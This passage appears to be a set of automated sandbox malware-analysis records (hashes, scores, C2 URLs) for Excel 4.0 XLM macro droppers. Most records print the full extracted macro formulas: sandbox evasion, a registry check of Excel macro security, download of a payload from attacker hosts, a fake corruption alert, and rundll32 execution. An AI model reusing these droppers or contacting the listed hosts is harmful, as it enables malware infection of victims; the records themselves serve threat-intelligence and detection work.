,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"V0QJ43WciM\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23dedb35093b9b5f8c2f149eeeff3435ec84d5b4f9890eef61d9ffffdaf96a4a"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23dedb35093b9b5f8c2f149eeeff3435ec84d5b4f9890eef61d9ffffdaf96a4a","filesize":116224,"md5":"76b0e9367cabe9321efc60fabf0e6a30","sha1":"d105c8b6dc0f783391721da98d37e0ffc83de86c","sha256":"23dedb35093b9b5f8c2f149eeeff3435ec84d5b4f9890eef61d9ffffdaf96a4a","sha512":"bb095189d7ddba906fa817676a8150c3d30a17b6d9114bb0cdd0874a980bb34d8b5daa25f6fbc50e7a676896d18b951c41d8e7df38dd32266c472ee2b2d757ac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23dedb35093b9b5f8c2f149eeeff3435ec84d5b4f9890eef61d9ffffdaf96a4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ymfgZKbKCU\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23f0d3c4c83432233e9a0025e90b14eec27479e8719085a6d5832284a8bd9ce5"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23f0d3c4c83432233e9a0025e90b14eec27479e8719085a6d5832284a8bd9ce5","filesize":225280,"md5":"96b13437b567590e15082bf5f99e2294","sha1":"452b957a649e897f5e05da88c52fbb90853894ae","sha256":"23f0d3c4c83432233e9a0025e90b14eec27479e8719085a6d5832284a8bd9ce5","sha512":"6a0969624877426297c0dd7a544e625f0600c4174fb2d8c8c30552fcad20ebb4382583edd306f78f5dd62b5393016dc11326d1f5992d337d2c2eeb9b41bcac58","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23f0d3c4c83432233e9a0025e90b14eec27479e8719085a6d5832284a8bd9ce5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CzM5pH2ynb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"240da34cba6d8e0ae66a63b5dfebbf123aec752d4a7188965ca7eb12b7c7e039"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"240da34cba6d8e0ae66a63b5dfebbf123aec752d4a7188965ca7eb12b7c7e039","filesize":206336,"md5":"126544255d29246db4dc67674e6596b4","sha1":"4d4c8f307dd4e00fe457db801d76ea784a6608a1","sha256":"240da34cba6d8e0ae66a63b5dfebbf123aec752d4a7188965ca7eb12b7c7e039","sha512":"4a9716e8eae4013cdd125408374276c6d29c99a7bc8cf412428e82b27b32813fbac38b78805916231f4412c0cdcfb90f20440c89badc180c928fab91126ba864","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"240da34cba6d8e0ae66a63b5dfebbf123aec752d4a7188965ca7eb12b7c7e039.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"s5e4TytqKY\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2428d1a0a62011d4d78a3d728921634e1aa94a59fb6d4d1c482adc97e94c48b2"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"2428d1a0a62011d4d78a3d728921634e1aa94a59fb6d4d1c482adc97e94c48b2","filesize":185344,"md5":"bb72d034cc0c4bbf7d3cea6b4ec7bc5d","sha1":"f9743f5e0071818be0765d4ef49043511b0f6eb8","sha256":"2428d1a0a62011d4d78a3d728921634e1aa94a59fb6d4d1c482adc97e94c48b2","sha512":"64a7ffd331b1807d0656adc04204150535637aef652810bc4f37ba1a0f9d99bc196d119e24f9396695f7b17881b43e4f70a2a7d644ef0ee2683f9d2aca5efb4b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2428d1a0a62011d4d78a3d728921634e1aa94a59fb6d4d1c482adc97e94c48b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2457faba28d05cc11d894ae0e29d3ba72188fcf0a9c275d7f6099ba249caa425"},"analysis":{"reported":"2020-04-09T16:15:21Z","score":10},"files":[{"filename":"2457faba28d05cc11d894ae0e29d3ba72188fcf0a9c275d7f6099ba249caa425","filesize":185344,"md5":"207783829c07502eb478438166473fe2","sha1":"dd12e9ccfef8b7bb9ce938a2f6cee12947222b8f","sha256":"2457faba28d05cc11d894ae0e29d3ba72188fcf0a9c275d7f6099ba249caa425","sha512":"1e87940dc4aa0cec086591f3919cbe94deb512bcf8d49f54ce0f73d14d3a5a7418cd3c6d6e29edb056ee8f6a6712a33f2ac0f04b048ae5b435e33124629435e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2457faba28d05cc11d894ae0e29d3ba72188fcf0a9c275d7f6099ba249caa425.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2458eec040213f72bb3ac118c26cb49ceb7f3591d1a534e4533f1ddaf07b49a1"},"analysis":{"reported":"2020-04-09T16:15:21Z","score":10},"files":[{"filename":"2458eec040213f72bb3ac118c26cb49ceb7f3591d1a534e4533f1ddaf07b49a1","filesize":221184,"md5":"017e9e16656be305a4dbbae2d3bdf4fc","sha1":"522f706cc8310a9d223899e6d2f678cd7852dd06","sha256":"2458eec040213f72bb3ac118c26cb49ceb7f3591d1a534e4533f1ddaf07b49a1","sha512":"f9d4a48ec763128fa1f843feccf470504ffd0329209b01c739dcb04b94540c58098bad4ccdee511a091ae434a94a34c4f3c5d6c10f4b1ea67696747d1e626e35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2458eec040213f72bb3ac118c26cb49ceb7f3591d1a534e4533f1ddaf07b49a1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Vg7lBHOb7F\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"245c268b0ad72b7e9f879f6e6319e7e444b2bf05a8c13a998a3957274af20107"},"analysis":{"reported":"2020-04-09T16:15:21Z","score":10},"files":[{"filename":"245c268b0ad72b7e9f879f6e6319e7e444b2bf05a8c13a998a3957274af20107","filesize":112640,"md5":"1dc29d48291cf0fb49d3c2e089617c25","sha1":"99c4a1180d91c61f965ed7c170ec0c75c5f77915","sha256":"245c268b0ad72b7e9f879f6e6319e7e444b2bf05a8c13a998a3957274af20107","sha512":"9f42bb49408e82251da89c621392226a4a26e799c807e0644838fcb4c4e20967d3252b1a4d968f017e7a19be0cbd38f121a7b307b666b3f3024e77f774e7acbc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"245c268b0ad72b7e9f879f6e6319e7e444b2bf05a8c13a998a3957274af20107.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"246688f7cf49c8641cca934340e61415a599d0f60d3db7db6e1d95334a760128"},"analysis":{"reported":"2020-04-09T16:15:21Z","score":10},"files":[{"filename":"246688f7cf49c8641cca934340e61415a599d0f60d3db7db6e1d95334a760128","filesize":212992,"md5":"c2e7ab57a0e5f5c56f6db0b733d32fdf","sha1":"cd2b7611915916796cd302ee0b33f8ed7eb4650a","sha256":"246688f7cf49c8641cca934340e61415a599d0f60d3db7db6e1d95334a760128","sha512":"fb01f715f1339adc2a7746ad13a1df2876467c75ba55a4bd4171fc8fc718b11cfcfbf1012eeb399c1f819dde86f2a5d4db3018f610bdb4dd310b87d8108eef73","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"246688f7cf49c8641cca934340e61415a599d0f60d3db7db6e1d95334a760128.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pFlDGDPmak\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"246a47bb4e424f169f5d2a5906e0d6c2dafa9de143e865fd105acb56ee8a97e6"},"analysis":{"reported":"2020-04-09T16:15:21Z","score":10},"files":[{"filename":"246a47bb4e424f169f5d2a5906e0d6c2dafa9de143e865fd105acb56ee8a97e6","filesize":219136,"md5":"2cf1d62579e96b8917095e0b848ca315","sha1":"3f94ab34ae7c1b89f89925c3b1c3573821a582e8","sha256":"246a47bb4e424f169f5d2a5906e0d6c2dafa9de143e865fd105acb56ee8a97e6","sha512":"2c67823508139d457e79df08c2a55619050f7436f129c66a9a91c694d70cf10da212d5793a6abddfc7397e9d7401688d90e0b61df6ade9a2728a38eb2ec85264","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"246a47bb4e424f169f5d2a5906e0d6c2dafa9de143e865fd105acb56ee8a97e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rB8qS5z8XY\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"247855cfe56e7424d345f24754bc73ea41eb9e2f9817c348d61a47bef215a7dd"},"analysis":{"reported":"2020-04-09T16:15:21Z","score":10},"files":[{"filename":"247855cfe56e7424d345f24754bc73ea41eb9e2f9817c348d61a47bef215a7dd","filesize":170496,"md5":"e419d0894723813f10e34cffaeb76caa","sha1":"1a6c921185e3bc09995b61e2b1e383263b726c74","sha256":"247855cfe56e7424d345f24754bc73ea41eb9e2f9817c348d61a47bef215a7dd","sha512":"6e945b9543daa447bbde053775a72daf793ebefedd56f01af5f054388f87aaaed8d3a4a1e2fbaba4165785a5aca7033677a4b56219dd504fa568aa7429e1ae1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"247855cfe56e7424d345f24754bc73ea41eb9e2f9817c348d61a47bef215a7dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RwW2s52Ls6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2481a2e01f50e626c9930efde8fcb8722ef7f26f192925528a6c5a0e13fdb111"},"analysis":{"reported":"2020-04-09T16:15:21Z","score":10},"files":[{"filename":"2481a2e01f50e626c9930efde8fcb8722ef7f26f192925528a6c5a0e13fdb111","filesize":185344,"md5":"24f23e6b73cbe99461eab64e4e2ccc42","sha1":"6b6497d2eaeda29d7643814f0250c0a1a62da325","sha256":"2481a2e01f50e626c9930efde8fcb8722ef7f26f192925528a6c5a0e13fdb111","sha512":"dbcf56370a8f701050d3524308e50cb81655e10d2676e27db3d0a618c125ed27580bd17e2537110f706a7c8062093b1e13f7f8b932dccfe685897eb001d6b4c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2481a2e01f50e626c9930efde8fcb8722ef7f26f192925528a6c5a0e13fdb111.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"249d944f0ecb2b394c8761dcbbf7d015ea752a4302f19847c432e7dfccb0466f"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"249d944f0ecb2b394c8761dcbbf7d015ea752a4302f19847c432e7dfccb0466f","filesize":185344,"md5":"704b0f66235d2b4615c073b9bce4218e","sha1":"a2d4a2ff349bdd0d0cb48ea040065a9fcc455d7c","sha256":"249d944f0ecb2b394c8761dcbbf7d015ea752a4302f19847c432e7dfccb0466f","sha512":"c492a2ea684e2483758731c6869ca8a9db512a2554220ee457b1c54fb90d0725f56525240d23e34265fdce5564c1c18b33267d1bcc71b8aaab9cd3f9eca236bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"249d944f0ecb2b394c8761dcbbf7d015ea752a4302f19847c432e7dfccb0466f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"249dc12dbaf933345e21e339ab247af3705205954cef78135486c50cd0da87a8"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"249dc12dbaf933345e21e339ab247af3705205954cef78135486c50cd0da87a8","filesize":212992,"md5":"83ae7a82bc0e4c2e2b903491f63c7331","sha1":"f7d3e75922310afdd0ee9d4f7c1112d4362bbb40","sha256":"249dc12dbaf933345e21e339ab247af3705205954cef78135486c50cd0da87a8","sha512":"6922808775b3ab889239d549ad0f50a1c27798955a0e486eed9dfb7aa57024f161bb94fabe7046ba6f85329ec794032eb451f49dc2a4e76c84441cc6aeb43717","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"249dc12dbaf933345e21e339ab247af3705205954cef78135486c50cd0da87a8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"96eRQe3FI5\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"24aab065d7f2e2b7981772f0acf041dda480044bbe924602af8e14598b99cf26"},"analysis":{"reported":"2020-04-09T16:15:22Z","score":10},"files":[{"filename":"24aab065d7f2e2b7981772f0acf041dda480044bbe924602af8e14598b99cf26","filesize":168448,"md5":"10c6bd42bc4c2361f70bd3b753f4fb5e","sha1":"950562a4e8a16e04dae7e6f86b00febf8250aed6","sha256":"24aab065d7f2e2b7981772f0acf041dda480044bbe924602af8e14598b99cf26","sha512":"2b9753272279c2e4d3f96904d1a82665664e12914c47d619d46c3234f6e66c9fe7840a9250ca2ed889577bac6916153bc4f7b54f3ba21631d69289b04a24044e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"24aab065d7f2e2b7981772f0acf041dda480044bbe924602af8e14598b99cf26.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 